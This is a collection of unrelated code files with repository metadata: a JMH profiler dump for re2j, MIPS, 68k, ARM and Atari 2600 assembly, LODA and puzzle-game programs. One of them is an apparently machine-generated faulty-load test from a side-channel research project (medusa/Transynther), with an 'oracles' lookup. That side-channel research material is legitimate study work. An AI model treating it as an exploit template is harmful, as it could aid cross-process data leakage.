0.05% 0.03% │ 0x00007eff1121ffe0: pop %rbp
0.05% 0.07% │ 0x00007eff1121ffe1: test %eax,0x1711d019(%rip) # 0x00007eff2833d000
│ ; {poll_return}
0.40% 0.72% │ 0x00007eff1121ffe7: retq ;*aastore
│ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│ ; - com.google.re2j.Inst$Alt5Inst::add@37 (line 265)
↘ 0x00007eff1121ffe8: mov $0xffffffe4,%esi
0x00007eff1121ffed: vmovq %xmm4,%rbp
0x00007eff1121fff2: mov %rdx,(%rsp)
0x00007eff1121fff6: mov %r14d,0x88(%rsp)
0x00007eff1121fffe: vmovsd %xmm5,0x8(%rsp)
0x00007eff11220004: mov %r9d,0x10(%rsp)
....................................................................................................
34.65% 35.28% <total for region 2>
....[Hottest Regions]...............................................................................
59.93% 61.05% C2, level 4 com.google.re2j.Machine::match, version 546 (1497 bytes)
34.65% 35.28% C2, level 4 com.google.re2j.Inst$Alt5Inst::add, version 508 (839 bytes)
1.16% 1.13% [kernel.kallsyms] [unknown] (0 bytes)
0.28% 0.08% C2, level 4 com.google.re2j.RE2::match, version 553 (49 bytes)
0.15% 0.01% [kernel.kallsyms] [unknown] (45 bytes)
0.15% 0.06% C2, level 4 java.util.Collections::shuffle, version 560 (104 bytes)
0.13% 0.01% C2, level 4 java.util.Collections::shuffle, version 560 (185 bytes)
0.11% 0.06% C2, level 4 com.google.re2j.RE2::match, version 553 (0 bytes)
0.10% 0.03% [kernel.kallsyms] [unknown] (66 bytes)
0.10% 0.11% C2, level 4 com.google.re2j.RE2::match, version 553 (33 bytes)
0.10% 0.07% C2, level 4 com.google.re2j.RE2::match, version 553 (0 bytes)
0.10% 0.01% C2, level 4 com.google.re2j.Machine::match, version 546 (120 bytes)
0.08% 0.07% C2, level 4 com.google.re2j.RE2::match, version 553 (0 bytes)
0.07% 0.04% C2, level 4 com.google.re2j.RE2::match, version 553 (111 bytes)
0.06% 0.01% [kernel.kallsyms] [unknown] (0 bytes)
0.06% 0.01% [vdso] [unknown] (5 bytes)
0.05% C2, level 4 com.google.re2j.RE2::match, version 553 (18 bytes)
0.05% 0.02% [kernel.kallsyms] [unknown] (39 bytes)
0.05% C2, level 4 com.google.re2j.RE2::match, version 553 (45 bytes)
0.04% 0.06% C2, level 4 com.google.re2j.Machine::match, version 546 (102 bytes)
2.57% 1.86% <...other 476 warm regions...>
....................................................................................................
100.00% 100.00% <totals>
....[Hottest Methods (after inlining)]..............................................................
60.11% 61.14% C2, level 4 com.google.re2j.Machine::match, version 546
34.65% 35.28% C2, level 4 com.google.re2j.Inst$Alt5Inst::add, version 508
2.79% 1.93% [kernel.kallsyms] [unknown]
1.02% 0.46% C2, level 4 com.google.re2j.RE2::match, version 553
0.30% 0.08% C2, level 4 java.util.Collections::shuffle, version 560
0.11% 0.02% C2, level 4 com.github.arnaudroger.re2j.generated.Re2jFindRegex_testExp2_jmhTest::testExp2_thrpt_jmhStub, version 596
0.10% 0.01% [vdso] [unknown]
0.06% 0.04% hsdis-amd64.so [unknown]
0.05% 0.05% libjvm.so _ZN18PSPromotionManager22copy_to_survivor_spaceILb0EEEP7oopDescS2_
0.04% 0.04% libjvm.so _ZN19GenericTaskQueueSetI17OverflowTaskQueueI8StarTaskL10MemoryType1ELj131072EELS2_1EE15steal_best_of_2EjPiRS1_
0.04% 0.01% libc-2.26.so __clock_gettime
0.04% 0.07% libjvm.so _ZN13RelocIterator10initializeEP7nmethodPhS2_
0.03% 0.00% libpthread-2.26.so __libc_write
0.03% 0.02% libjvm.so _ZN18PSPromotionManager18drain_stacks_depthEb
0.02% libjvm.so _ZN2os13javaTimeNanosEv
0.02% 0.04% libc-2.26.so __strlen_avx2
0.02% 0.04% libc-2.26.so _IO_fwrite
0.02% 0.04% libjvm.so _ZN13InstanceKlass17oop_push_contentsEP18PSPromotionManagerP7oopDesc
0.02% 0.08% libc-2.26.so vfprintf
0.01% 0.01% libjvm.so _ZN9StealTask5do_itEP13GCTaskManagerj
0.52% 0.40% <...other 80 warm methods...>
....................................................................................................
100.00% 99.77% <totals>
....[Distribution by Source]........................................................................
96.20% 96.98% C2, level 4
2.79% 1.93% [kernel.kallsyms]
0.56% 0.64% libjvm.so
0.17% 0.35% libc-2.26.so
0.10% 0.01% [vdso]
0.07% 0.04% libpthread-2.26.so
0.07% 0.05% hsdis-amd64.so
0.03% interpreter
0.00% runtime stub
0.00% C1, level 3
....................................................................................................
100.00% 100.00% <totals>
# Run complete. Total time: 00:00:45
Benchmark Mode Cnt Score Error Units
Re2jFindRegex.testExp2 thrpt 20 20027.184 ± 500.785 ops/s
Re2jFindRegex.testExp2:·asm thrpt NaN ---
| 107.714736 | 172 | 0.353413 |
a30741e95bf52ca3236a0acbdfd0678891927e98 | 485 | asm | Assembly | P5/P5_TestCode/P5_L1_testcase10/P5_L1_testcase10/mips10.asm | alxzzhou/BUAA_CO_2020 | b54bf367081a5a11701ebc3fc78a23494aecca9e | [
"Apache-2.0"
] | 1 | 2022-01-23T09:24:47.000Z | 2022-01-23T09:24:47.000Z | P5/P5_TestCode/P5_L1_testcase10/P5_L1_testcase10/mips10.asm | alxzzhou/BUAA_CO_2020 | b54bf367081a5a11701ebc3fc78a23494aecca9e | [
"Apache-2.0"
] | null | null | null | P5/P5_TestCode/P5_L1_testcase10/P5_L1_testcase10/mips10.asm | alxzzhou/BUAA_CO_2020 | b54bf367081a5a11701ebc3fc78a23494aecca9e | [
"Apache-2.0"
] | null | null | null | .data
nums: .space 4096
.text
ori $s3, 0x3000
ori $t3, $0, 16
ori $t2, $0, 12
ori $t1, $0, 8
ori $t0, $0, 4
jal loop
sw $ra, nums($t0)
ori $t0, $0, 1
loop:
jal loop2
nop
loop2:
sw $ra, nums($t1)
jal loop3
nop
loop3:
nop
sw $ra, nums($t2)
jal loop4
nop
loop4:
nop
nop
sw $ra, nums($t3)
jal loop5
subu $t0, $ra, $s3
loop5:
sw $t3, nums($t0)
jal loop6
subu $t0, $ra, $s3
loop6:
nop
sw $t3, nums($t0)
jal loop7
subu $t0, $ra, $s3
loop7:
nop
nop
sw $t3, nums($t0) | 11.547619 | 19 | 0.587629 |
c06fc1483cf1aac017978493df510c0914ca8e92 | 1,700 | asm | Assembly | sbsext/ut/chanf.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | sbsext/ut/chanf.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | sbsext/ut/chanf.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | * Find entry for a BASIC channel V0.4 1984 Tony Tebby QJUMP
*
section utils
*
xdef ut_chanv find vacant hole
xdef ut_chanf find or create #n
xdef ut_chanp preset channel entry at D4
*
xref ut_chget get channel
*
include dev8_sbsext_ext_keys
*
ut_chanv
moveq #ch.lench,d3
moveq #3,d6 start at channel #3
moveq #3*ch.lench,d4
add.l bv_chbas(a6),d4 start address in table
utcv_loop
cmp.l bv_chp(a6),d4 is pointer off end of table?
bge.s utc_extn ... yes, extend the table
tst.w ch.id+2(a6,d4.l) check if vacant
blt.s utc_pres ... yes, preset it
addq.w #1,d6 next entry
add.l d3,d4
bra.s utcv_loop
*
ut_chanf
bsr.l ut_chget get channel
beq.s utc_close ... its open!!
moveq #err.no,d1 not open?
cmp.l d1,d0
bne.s utc_rts ... no
ut_chanp
utc_extn
move.l d4,d1 is channel within table?
sub.l bv_chp(a6),d1
blt.s utc_pres ... yes, preset entry
*
sub.l bv_chbas(a6),d4
moveq #ch.lench,d3 space for one extra channel
add.l d3,d1 ... no, allocate enough space
move.l bv..chrix*3+qlv.off+2,a2
jsr bvo_chch(a2) in channel area
add.l bv_chbas(a6),d4
*
move.l bv_chp(a6),a2 now fill the id in each entry
moveq #-1,d0 with -1
utc_sid
move.l d0,ch.id(a6,a2.l) put it in
add.w #ch.lench,a2 move to next entry
cmp.l d4,a2 off end yet?
ble.s utc_sid
move.l a2,bv_chp(a6) save new top pointer
bra.s utc_pres
*
utc_close
moveq #io.close,d0 close channel
trap #2
*
utc_pres
moveq #ch.lench,d3 preset all entrys
add.l d3,d4 move to end
utc_cldef
subq.l #4,d4
clr.l (a6,d4.l) to zero
subq.l #4,d3
bgt.s utc_cldef
*
not.l ch.id(a6,d4.l) except channel ID
move.w #80,ch.width(a6,d4.l) and default width
moveq #0,d0
utc_rts
rts
end
| 22.368421 | 63 | 0.694706 |
50b2b55918545b427410bf3130d76da46f72308f | 671 | asm | Assembly | oeis/349/A349969.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/349/A349969.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/349/A349969.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A349969: a(n) = Sum_{k=0..n} (k*n)^(n-k).
; Submitted by Jon Maiga
; 1,1,3,16,141,1871,34951,873174,27951929,1107415549,52891809491,2987861887924,196828568831365,14950745148070499,1296606974501951743,127238563043551898986,14012626653816435643633,1719136634276882827095009,233448782800118609096218891,34893145891546400940329802904,5712757430819663970842189193981,1020083779765117501437430081998295,197884192473916002385084401598148727,41553204591846765022034292934106818910,9413715308172453451848982631384457822505,2293669634259001341767097109240873499128101
mov $2,$0
lpb $0
sub $0,1
mov $3,$2
mul $3,$0
add $4,1
pow $3,$4
add $1,$3
lpe
mov $0,$1
add $0,1
| 41.9375 | 490 | 0.825633 |
576529703b0460d312486bc13bc3312b3b86c8fa | 4,437 | asm | Assembly | CpuA32/TestData/switch.asm | robertmuth/Cwerg | fdf30b06c93b4620c0a45b448b6d92acb81c35f0 | [
"Apache-2.0"
] | 171 | 2020-01-30T16:58:07.000Z | 2022-03-27T22:12:17.000Z | CpuA32/TestData/switch.asm | robertmuth/Cwerg | fdf30b06c93b4620c0a45b448b6d92acb81c35f0 | [
"Apache-2.0"
] | 14 | 2021-05-15T02:12:09.000Z | 2022-03-16T04:16:18.000Z | CpuA32/TestData/switch.asm | robertmuth/Cwerg | fdf30b06c93b4620c0a45b448b6d92acb81c35f0 | [
"Apache-2.0"
] | 5 | 2021-03-01T20:52:13.000Z | 2022-03-07T06:35:03.000Z | ############################################################
# CodeGen exit
############################################################
# REGSTATS exit glo: 0 0 loc: 0 1
# glo_lac []
# glo_not _lac []
# sig: IN: [U32] -> OUT: [] stk_size:0
.fun exit 16
# live-out sp]
.bbl start 4
str_imm_sub_pre sp 4 r7
mov_imm r7 1
svc 0
ldr_imm_add_post r7 sp 4
bx lr
.endfun
############################################################
# CodeGen putchar
############################################################
# REGSTATS putchar glo: 0 0 loc: 0 2
# glo_lac []
# glo_not_lac []
# sig: IN: [U8] -> OUT: [] stk_size:16
.fun putchar 16
sub_imm sp sp 16
# live-out sp]
.bbl start 4
mov_regimm r1 r0 lsl 0
mov_regimm r0 sp lsl 0
strb_imm_add sp 0 r1
mov_imm r2 1
mov_regimm r1 r0 lsl 0
mov_imm r0 1
str_imm_sub_pre sp 4 r7
mov_imm r7 4
svc 0
ldr_imm_add_post r7 sp 4
add_imm sp sp 16
bx lr
.endfun
############################################################
# CodeGen writeln
############################################################
# REGSTATS writeln glo: 0 0 loc: 0 2
# glo_lac []
# glo_not_lac []
# sig: IN: [A32 U32] -> OUT: [] stk_size:0
.fun writeln 16
stmdb_update sp reglist:0x4000
# live-out sp]
.bbl start 4
mov_regimm r2 r1 lsl 0
mov_regimm r1 r0 lsl 0
mov_imm r0 1
str_imm_sub_pre sp 4 r7
mov_imm r7 4
svc 0
ldr_imm_add_post r7 sp 4
mov_imm r0 10
bl expr:call:putchar
ldmia_update reglist:0x8000 sp
.endfun
############################################################
# CodeGen print_num
############################################################
# REGSTATS print_num glo: 1 2 loc: 0 3
# glo_lac ['rem']
# glo_not_lac ['div', 'sp']
# sig: IN: [U32] -> OUT: [] stk_size:0
.fun print_num 16
stmdb_update sp reglist:0x4040
# live-out div rem sp]
.bbl start 4
mov_regimm r1 r0 lsl 0
mov_imm r0 10
udiv r6 r1 r0
mov_imm r0 10
mul r6 r6 r0
sub_regimm r6 r1 r6 lsl 0
mov_imm r0 10
udiv lr r1 r0
cmp_imm lr 0
b eq expr:jump24:skip
# live-out rem sp]
.bbl ddd 4
mov_regimm r0 lr lsl 0
bl expr:call:print_num
# live-out sp]
.bbl skip 4
add_imm r6 r6 0x30
mov_regimm r0 r6 lsl 0
bl expr:call:putchar
ldmia_update reglist:0x8040 sp
.endfun
############################################################
# CodeGen print_num_ln
############################################################
# REGSTATS print_num_ln glo: 0 0 loc: 0 1
# glo_lac []
# glo_not_lac []
# sig: IN: [U32] -> OUT: [] stk_size:0
.fun print_num_ln 16
stmdb_update sp reglist:0x4000
# live-out sp]
.bbl start 4
bl expr:call:print_num
mov_imm r0 10
bl expr:call:putchar
ldmia_update reglist:0x8000 sp
.endfun
############################################################
# CodeGen _start
############################################################
# REGSTATS _start glo: 1 1 loc: 0 1
# glo_lac ['i']
# glo_not_lac ['sp']
# sig: IN: [] -> OUT: [] stk_size:0
.fun _start 16
.mem switch_tab 4 rodata
.addr.bbl 4 labelD
.addr.bbl 4 labelA
.addr.bbl 4 labelB
.addr.bbl 4 labelD
.addr.bbl 4 labelC
.endmem
stmdb_update sp reglist:0x4040
# live-out i sp]
.bbl start 4
mov_imm r6 0
# live-out i sp]
.bbl loop 4
movw r0 expr:movw_abs_nc:switch_tab
movt r0 expr:movt_abs:switch_tab
ldr_reg_add pc r0 r6 lsl 2
# live-out i sp]
.bbl labelA 4
mov_imm r0 0x41
bl expr:call:putchar
mov_imm r0 10
bl expr:call:putchar
b expr:jump24:tail
# live-out i sp]
.bbl labelB 4
mov_imm r0 0x42
bl expr:call:putchar
mov_imm r0 10
bl expr:call:putchar
b expr:jump24:tail
# live-out i sp]
.bbl labelC 4
mov_imm r0 0x43
bl expr:call:putchar
mov_imm r0 10
bl expr:call:putchar
b expr:jump24:tail
# live-out i sp]
.bbl labelD 4
mov_imm r0 0x44
bl expr:call:putchar
mov_imm r0 10
bl expr:call:putchar
# live-out i sp]
.bbl tail 4
add_imm r6 r6 1
cmp_imm r6 5
b cc expr:jump24:loop
# live-out sp]
.bbl tail_1 4
mov_imm r0 0
bl expr:call:exit
ldmia_update reglist:0x8040 sp
.endfun
# STATS:
# canonicalized: 0
# const_fold: 0
# const_prop: 14
# dropped_regs: 8
# ls_st_simplify: 1
# move_elim: 0
# strength_red: 1
# useless: 0
| 24.379121 | 60 | 0.528285 |
2527544df3b38a9b3717abfa9d2ccdc651f32ef5 | 9,011 | asm | Assembly | lib/TIA.asm | adamrmoss/atari-2600-tutorials | 42623105f10eccf19bdb741ec25f42fb4e4d7130 | [
"Unlicense"
] | null | null | null | lib/TIA.asm | adamrmoss/atari-2600-tutorials | 42623105f10eccf19bdb741ec25f42fb4e4d7130 | [
"Unlicense"
] | 1 | 2021-01-02T19:26:03.000Z | 2021-01-02T19:26:03.000Z | lib/TIA.asm | adamrmoss/atari-2600-tutorials | 42623105f10eccf19bdb741ec25f42fb4e4d7130 | [
"Unlicense"
] | null | null | null | ; ╔═════════════════════════════════════════════════════════════════════════════════════╗
; ║ TIA_BASE_ADDRESS ║
; ╠═════════════════════════════════════════════════════════════════════════════════════╣
; ║ The TIA_BASE_ADDRESS defines the base address of access to TIA registers. ║
; ║ Normally 0, the base address should (externally, before including this file) ║
; ╚═════════════════════════════╗ be set to $40 when creating 3F-bankswitched (and ║
ifnconst TIA_BASE_ADDRESS ; ║ other?) cartridges. The reason is that this ║
TIA_BASE_ADDRESS = 0 ; ║ bankswitching scheme treats any access to ║
endif ; ║ locations < $40 as a bankswitch. ║
; ╔═════════════════════════════╩═══════════════════════════════════════════════════════╣
; ║ Note: The address may be defined on the command-line using the -D switch, eg: ║
; ║ dasm.exe code.asm -DTIA_BASE_ADDRESS=$40 -f3 -v5 -ocode.bin ║
; ║ *OR* by declaring the label before including this file, eg: ║
; ║ TIA_BASE_ADDRESS = $40 ║
; ║ include "TIA.asm" ║
; ╠═════════════════════════════════════════════════════════════════════════════════════╣
; ║ Alternate read/write address capability - allows for some disassembly compatibility ║
; ║ to allow reassembly to binary perfect copies). This is essentially catering for ║
; ║ the mirrored ROM hardware registers. ║
; ╚═════════════════════════════════════════╦═══════════════════════════════════════════╣
ifnconst TIA_BASE_READ_ADDRESS ; ║ Usage: As per above, define the ║
TIA_BASE_READ_ADDRESS = TIA_BASE_ADDRESS ; ║ TIA_BASE_READ_ADDRESS and/or ║
endif ; ║ TIA_BASE_WRITE_ADDRESS using the ║
; ║ -D command-line switch, as ║
ifnconst TIA_BASE_WRITE_ADDRESS ; ║ required. If the addresses are ║
TIA_BASE_WRITE_ADDRESS = TIA_BASE_ADDRESS ; ║ not defined, they default to the ║
endif ; ║ TIA_BASE_ADDRESS. ║
; ╚═══════════════════════════════════════════╝
; ╔═════════════════════════════════════════════════════════════════════════════════════╗
; ║ TIA MEMORY MAP ║
; ╚═══════════════════════════════╦═════════════════════════════════════════════════════╣
seg.u TIA_REGISTERS_WRITE ; ║ Segment for TIA Writes, shares address space with ║
rorg TIA_BASE_WRITE_ADDRESS ; ║ the segment for TIA Reads. ║
; ╔═════╦═════╩═════╦═══════════════════════════════════════════════╣
VSYNC .byte ; ║ $00 ║ 0000 00x0 ║ Vertical Sync Set-Clear ║
VBLANK .byte ; ║ $01 ║ xx00 00x0 ║ Vertical Blank Set-Clear ║
WSYNC .byte ; ║ $02 ║ ---- ---- ║ Wait for Horizontal Blank ║
RSYNC .byte ; ║ $03 ║ ---- ---- ║ Reset Horizontal Sync Counter ║
NUSIZ0 .byte ; ║ $04 ║ 00xx 0xxx ║ Number-Size player/missle 0 ║
NUSIZ1 .byte ; ║ $05 ║ 00xx 0xxx ║ Number-Size player/missle 1 ║
COLUP0 .byte ; ║ $06 ║ xxxx xxx0 ║ Color-Luminance Player 0 ║
COLUP1 .byte ; ║ $07 ║ xxxx xxx0 ║ Color-Luminance Player 1 ║
COLUPF .byte ; ║ $08 ║ xxxx xxx0 ║ Color-Luminance Playfield ║
COLUBK .byte ; ║ $09 ║ xxxx xxx0 ║ Color-Luminance Background ║
CTRLPF .byte ; ║ $0a ║ 00xx 0xxx ║ Control Playfield, Ball, Collisions ║
REFP0 .byte ; ║ $0b ║ 0000 x000 ║ Reflection Player 0 ║
REFP1 .byte ; ║ $0c ║ 0000 x000 ║ Reflection Player 1 ║
PF0 .byte ; ║ $0d ║ xxxx 0000 ║ Playfield Register Byte 0 ║
PF1 .byte ; ║ $0e ║ xxxx xxxx ║ Playfield Register Byte 1 ║
PF2 .byte ; ║ $0f ║ xxxx xxxx ║ Playfield Register Byte 2 ║
RESP0 .byte ; ║ $10 ║ ---- ---- ║ Reset Player 0 ║
RESP1 .byte ; ║ $11 ║ ---- ---- ║ Reset Player 1 ║
RESM0 .byte ; ║ $12 ║ ---- ---- ║ Reset Missle 0 ║
RESM1 .byte ; ║ $13 ║ ---- ---- ║ Reset Missle 1 ║
RESBL .byte ; ║ $14 ║ ---- ---- ║ Reset Ball ║
AUDC0 .byte ; ║ $15 ║ 0000 xxxx ║ Audio Control 0 ║
AUDC1 .byte ; ║ $16 ║ 0000 xxxx ║ Audio Control 1 ║
AUDF0 .byte ; ║ $17 ║ 000x xxxx ║ Audio Frequency 0 ║
AUDF1 .byte ; ║ $18 ║ 000x xxxx ║ Audio Frequency 1 ║
AUDV0 .byte ; ║ $19 ║ 0000 xxxx ║ Audio Volume 0 ║
AUDV1 .byte ; ║ $1a ║ 0000 xxxx ║ Audio Volume 1 ║
GRP0 .byte ; ║ $1b ║ xxxx xxxx ║ Graphics Register Player 0 ║
GRP1 .byte ; ║ $1c ║ xxxx xxxx ║ Graphics Register Player 1 ║
ENAM0 .byte ; ║ $1d ║ 0000 00x0 ║ Graphics Enable Missle 0 ║
ENAM1 .byte ; ║ $1e ║ 0000 00x0 ║ Graphics Enable Missle 1 ║
ENABL .byte ; ║ $1f ║ 0000 00x0 ║ Graphics Enable Ball ║
HMP0 .byte ; ║ $20 ║ xxxx 0000 ║ Horizontal Motion Player 0 ║
HMP1 .byte ; ║ $21 ║ xxxx 0000 ║ Horizontal Motion Player 1 ║
HMM0 .byte ; ║ $22 ║ xxxx 0000 ║ Horizontal Motion Missle 0 ║
HMM1 .byte ; ║ $23 ║ xxxx 0000 ║ Horizontal Motion Missle 1 ║
HMBL .byte ; ║ $24 ║ xxxx 0000 ║ Horizontal Motion Ball ║
VDELP0 .byte ; ║ $25 ║ 0000 000x ║ Vertical Delay Player 0 ║
VDELP1 .byte ; ║ $26 ║ 0000 000x ║ Vertical Delay Player 1 ║
VDELBL .byte ; ║ $27 ║ 0000 000x ║ Vertical Delay Ball ║
RESMP0 .byte ; ║ $28 ║ 0000 00x0 ║ Reset Missle 0 to Player 0 ║
RESMP1 .byte ; ║ $29 ║ 0000 00x0 ║ Reset Missle 1 to Player 1 ║
HMOVE .byte ; ║ $2a ║ ---- ---- ║ Apply Horizontal Motion ║
HMCLR .byte ; ║ $2b ║ ---- ---- ║ Clear Horizontal Move Registers ║
CXCLR .byte ; ║ $2c ║ ---- ---- ║ Clear Collision Latches ║
; ╚═════╩════╦══════╩═══════════════════════════════════════════════╣
seg.u TIA_REGISTERS_READ ; ║ Segment for TIA Writes, shares address space with ║
rorg TIA_BASE_READ_ADDRESS ; ║ the segment for TIA Reads. ╔═══════╦═════════════════╣
; ╚════════════════════════════╝ ║ bit 7 bit 6 ║
; ╔═════╦═══════════╦═════════════════════════════╬═════════════════╣
CXM0P .byte ; ║ $00 ║ xx00 0000 ║ Read Collision ║ M0-P1 M0-P0 ║
CXM1P .byte ; ║ $01 ║ xx00 0000 ║ Read Collision ║ M1-P0 M1-P1 ║
CXP0FB .byte ; ║ $02 ║ xx00 0000 ║ Read Collision ║ P0-PF P0-BL ║
CXP1FB .byte ; ║ $03 ║ xx00 0000 ║ Read Collision ║ P1-PF P1-BL ║
CXM0FB .byte ; ║ $04 ║ xx00 0000 ║ Read Collision ║ M0-PF M0-BL ║
CXM1FB .byte ; ║ $05 ║ xx00 0000 ║ Read Collision ║ M1-PF M1-BL ║
CXBLPF .byte ; ║ $06 ║ x000 0000 ║ Read Collision ║ BL-PF ----- ║
CXPPMM .byte ; ║ $07 ║ xx00 0000 ║ Read Collision ║ P0-P1 M0-M1 ║
INPT0 .byte ; ║ $08 ║ x000 0000 ║ Read Pot Port 0 ╚═════════════════╣
INPT1 .byte ; ║ $09 ║ x000 0000 ║ Read Pot Port 1 ║
INPT2 .byte ; ║ $0a ║ x000 0000 ║ Read Pot Port 2 ║
INPT3 .byte ; ║ $0b ║ x000 0000 ║ Read Pot Port 3 ║
INPT4 .byte ; ║ $0c ║ x000 0000 ║ Read Input (Trigger) 0 ║
INPT5 .byte ; ║ $0d ║ x000 0000 ║ Read Input (Trigger) 1 ║
; ╚═════╩═══════════╩═══════════════════════════════════════════════╝
| 89.217822 | 90 | 0.376207 |
36d94ee77d528f92c488df363e62d66a8a8fcb1b | 629 | asm | Assembly | solutions/52 - The Mode Code/size-32-speed-110.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 45 | 2018-09-05T04:56:59.000Z | 2021-11-22T08:57:26.000Z | solutions/52 - The Mode Code/size-32-speed-110.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 36 | 2018-09-01T11:34:26.000Z | 2021-05-19T23:20:49.000Z | solutions/52 - The Mode Code/size-32-speed-110.asm | michaelgundlach/7billionhumans | 02c6f3963364362c95cb516cbc6ef1efc073bb2e | [
"MIT"
] | 36 | 2018-09-01T07:44:19.000Z | 2021-09-10T19:07:35.000Z | -- 7 Billion Humans (2053) --
-- 52: The Mode Code --
-- Author: Tiza59
-- Size: 32
-- Speed: 110
mem4 = nearest datacube
a:
if w == worker:
mem1 = calc mem1 + 1
step w
jump a
endif
step nw
step n
b:
c:
if c == mem1 or
e == mem1:
if c == mem1 and
e == mem1:
mem2 = calc mem2 + 2
else:
mem2 = calc mem2 + 1
endif
endif
if n == datacube:
step n
jump b
endif
step e
step e
step e
d:
if c == mem1 or
w == mem1:
if c == mem1 and
w == mem1:
mem2 = calc mem2 + 2
else:
mem2 = calc mem2 + 1
endif
endif
if s == datacube:
step s
jump d
endif
if e != nothing:
step e
jump c
endif
pickup mem4
write mem2
drop
| 11.232143 | 29 | 0.605723 |
d2802b17de33d4a84ddd2c4b1b5d075842135ac4 | 1,596 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_2_1026.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_2_1026.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_2_1026.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
// Store
lea addresses_A+0x104a0, %rdx
nop
nop
add %rbp, %rbp
mov $0x5152535455565758, %rax
movq %rax, (%rdx)
and %r9, %r9
// REPMOV
lea addresses_US+0x67e0, %rsi
lea addresses_US+0x16d0e, %rdi
nop
nop
nop
nop
and %r14, %r14
mov $81, %rcx
rep movsw
nop
nop
nop
nop
and $18087, %rdx
// Store
mov $0x465529000000042d, %r14
nop
nop
nop
and $3625, %r13
mov $0x5152535455565758, %rcx
movq %rcx, %xmm2
vmovups %ymm2, (%r14)
add %rdx, %rdx
// Faulty Load
lea addresses_normal+0x128a0, %r14
nop
nop
nop
nop
nop
cmp $17146, %rax
mov (%r14), %rsi
lea oracles, %r9
and $0xff, %rsi
shlq $12, %rsi
mov (%r9,%rsi,1), %rsi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 8}}
{'src': {'type': 'addresses_US', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_US', 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_NC', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 0}}
[Faulty Load]
{'src': {'type': 'addresses_normal', 'AVXalign': False, 'size': 8, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'34': 2}
34 34
*/
| 17.733333 | 142 | 0.64787 |
dcff246ec27553c5254d091c5079341b8ebb749e | 185 | asm | Assembly | test/e2e/data/arm8.asm | matanlurey/armv4t.dart | 06235938d16cb1f2b09d26f564b985854e4155c0 | [
"MIT"
] | 8 | 2020-06-21T22:05:00.000Z | 2021-10-06T19:59:20.000Z | test/e2e/data/arm8.asm | matanlurey/armv4t.dart | 06235938d16cb1f2b09d26f564b985854e4155c0 | [
"MIT"
] | 82 | 2020-06-21T22:02:00.000Z | 2020-08-04T01:48:42.000Z | test/e2e/data/arm8.asm | matanlurey/armv4t.dart | 06235938d16cb1f2b09d26f564b985854e4155c0 | [
"MIT"
] | 1 | 2020-06-22T15:16:02.000Z | 2020-06-22T15:16:02.000Z | ; expected result: 0x200 = 10, 0x204 = 83
mov r13, #0x200
mov r2, #83
mov r3, #10
cmp r2, r3
blt less
str r3, [sp]
str r2, [sp, #4]
b exit
less:
str r2, [sp]
str r3, [sp, #4]
exit:
| 10.277778 | 41 | 0.594595 |
6e61a17f2250e2feeda10cbafaea4a43326ea1dd | 5,441 | asm | Assembly | src/cm_mainmenu_rng.asm | helgefmi/lttphack | 2d3b80b029c7e5a46e9329856dadff0ed611a596 | [
"MIT"
] | 28 | 2016-02-19T04:33:56.000Z | 2022-02-25T05:30:58.000Z | src/cm_mainmenu_rng.asm | helgefmi/lttphack | 2d3b80b029c7e5a46e9329856dadff0ed611a596 | [
"MIT"
] | 4 | 2017-08-01T18:20:49.000Z | 2019-07-28T13:39:01.000Z | src/cm_mainmenu_rng.asm | helgefmi/lttphack | 2d3b80b029c7e5a46e9329856dadff0ed611a596 | [
"MIT"
] | 6 | 2016-10-05T10:27:31.000Z | 2019-07-19T14:14:29.000Z | ; RNG CONTROL {{{
cm_main_goto_rng_control:
%cm_submenu("RNG control", cm_submenu_rng_control)
cm_submenu_rng_control:
dw cm_rng_drops
